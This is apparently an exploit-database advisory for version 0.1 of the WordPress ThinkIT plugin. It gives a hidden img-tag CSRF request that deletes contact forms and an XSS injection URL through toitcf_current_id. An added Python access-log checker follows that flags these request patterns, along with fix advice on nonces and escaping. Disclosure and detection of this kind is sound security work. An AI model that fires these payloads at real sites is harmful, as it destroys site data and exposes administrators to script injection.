###################################################################################################################################
# Exploit Title: WordPress ThinkIT plugin - CSRF / XSS
# Date: 2013 15 August
# Exploit Author: Yashar shahinzadeh
# Special thanks to Mormoroth
# Credit goes for: http://y-shahinzadeh.ir & ha.cker.ir
# Vendor Homepage: http://thinkoverit.com/
# Tested on: Linux & Windows, PHP 5.2.9
# Affected Version: 0.1
#
# Contacts: { http://Twitter.com/YShahinzadeh , http://y-shahinzadeh.ir , http://Twitter.com/Mormoroth , http://mormoroth.ir }
###################################################################################################################################

Summary:
========
1. CSRF - Delete a form
2. Cross site scripting

1. CSRF - Delete a form:
========================
The contact form ID can be read from the HTML page source:

<input type="hidden" value="[ID]" name="toit-form-id"></input>

where [ID] is the form ID. The following crafted request can then be used to delete the form completely:

<img src="http://[WP]/wp-admin/admin.php?toitcf_current_id=[ID]&action=delete&page=toitcf" width="1" height="1">

Obviously, ID must be replaced.

2. Cross site scripting:
========================
http://[WP]/wordpress/wp-admin/admin.php?toitcf_current_id=[XSS]&page=toitcf

/** Yashar shahinzadeh **/
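
Added example (not part of the original advisory or the plugin's code): a log check that flags the two request patterns described above in a combined-format web server access log. The host blog.example, the sample log lines and the rule that form IDs are plain integers are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request target and Referer from a combined-format access log line.
LOG_RE = re.compile(
    r'"(?:GET|POST) (?P<target>\S+) HTTP/[\d.]+" \d{3} \S+ "(?P<referer>[^"]*)"')

# Constructed sample lines; blog.example stands in for the [WP] host.
SAMPLE_LOG = [
    '203.0.113.5 - - [15/Aug/2013:10:00:01 +0000] "GET /wp-admin/admin.php'
    '?page=toitcf&toitcf_current_id=3 HTTP/1.1" 200 5120'
    ' "http://blog.example/wp-admin/" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Aug/2013:10:02:11 +0000] "GET /wp-admin/admin.php'
    '?toitcf_current_id=3&action=delete&page=toitcf HTTP/1.1" 302 0'
    ' "http://other.example/page.html" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Aug/2013:10:03:40 +0000] "GET /wordpress/wp-admin/admin.php'
    '?toitcf_current_id=1%22%3E%3Cx%3E&page=toitcf HTTP/1.1" 200 5300'
    ' "-" "Mozilla/5.0"',
    '203.0.113.5 - - [15/Aug/2013:10:05:02 +0000] "GET /wp-admin/admin.php'
    '?toitcf_current_id=4&action=delete&page=toitcf HTTP/1.1" 302 0'
    ' "http://blog.example/wp-admin/admin.php?page=toitcf" "Mozilla/5.0"',
]

def classify(line, site_host):
    """Return the findings for one access-log line (empty list if clean)."""
    m = LOG_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group("target"))
    qs = parse_qs(url.query, keep_blank_values=True)
    if not url.path.endswith("/wp-admin/admin.php") or qs.get("page") != ["toitcf"]:
        return []
    findings = []
    form_id = qs.get("toitcf_current_id", [""])[0]
    # Assumption: legitimate form IDs are plain ASCII integers.
    if form_id and not re.fullmatch(r"[0-9]+", form_id):
        findings.append("non-numeric toitcf_current_id")
    referer_host = urlsplit(m.group("referer")).hostname
    if qs.get("action") == ["delete"] and referer_host != site_host:
        findings.append("delete with off-site or missing Referer")
    return findings

def scan(lines, site_host):
    """Map line index -> findings for each line that raised any."""
    results = ((i, classify(l, site_host)) for i, l in enumerate(lines))
    return {i: f for i, f in results if f}

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, "blog.example"))
```

Log review only surfaces attempts; the fix belongs in the plugin, which should verify a WordPress nonce before deleting a form and escape toitcf_current_id on output.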